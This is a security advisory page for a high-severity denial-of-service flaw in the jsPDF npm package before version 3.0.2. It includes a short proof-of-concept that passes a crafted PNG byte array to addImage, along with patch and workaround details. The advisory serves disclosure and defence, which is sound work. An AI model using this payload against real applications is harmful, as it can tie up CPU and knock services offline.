GHSA-8mvj-3j78-4qmw

Suggest an improvement
Source
https://github.com/advisories/GHSA-8mvj-3j78-4qmw
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-8mvj-3j78-4qmw/GHSA-8mvj-3j78-4qmw.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-8mvj-3j78-4qmw
Aliases
Related
Published
2025-08-26T16:19:04Z
Modified
2025-08-27T18:53:26Z
Severity
  • 8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N CVSS Calculator
Summary
jsPDF Denial of Service (DoS)
Details

Impact

User control of the first argument of the addImage method results in CPU utilization and denial of service.

If given the possibility to pass unsanitized image data or URLs to the addImage method, a user can provide a harmful PNG file that results in high CPU utilization and denial of service.

Other affected methods are: html.

Example payload:

import { jsPDF } from "jspdf" 

const payload = new Uint8Array([117, 171, 90, 253, 166, 154, 105, 166, 154])

const doc = new jsPDF();
const startTime = performance.now();
try {
  doc.addImage(payload, "PNG", 10, 40, 180, 180, undefined, "SLOW");
} finally {
  const endTime = performance.now();
  console.log(`Call to doc.addImage took ${endTime - startTime} milliseconds`);
}

Patches

The vulnerability was fixed in jsPDF 3.0.2. Upgrade to jspdf@>=3.0.2.

In jspdf@>=3.0.2, invalid PNG files throw an Error instead of causing very long running loops.

Workarounds

Sanitize image data or URLs before passing it to the addImage method or one of the other affected methods.

Credits

Researcher: Aleksey Solovev (Positive Technologies)

Database specific
{
    "cwe_ids": [
        "CWE-835"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-26T16:19:04Z",
    "nvd_published_at": "2025-08-26T16:15:37Z",
    "severity": "HIGH"
}
References

Affected packages

npm / jspdf

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
3.0.2

Database specific

{
    "last_known_affected_version_range": "<= 3.0.1"
}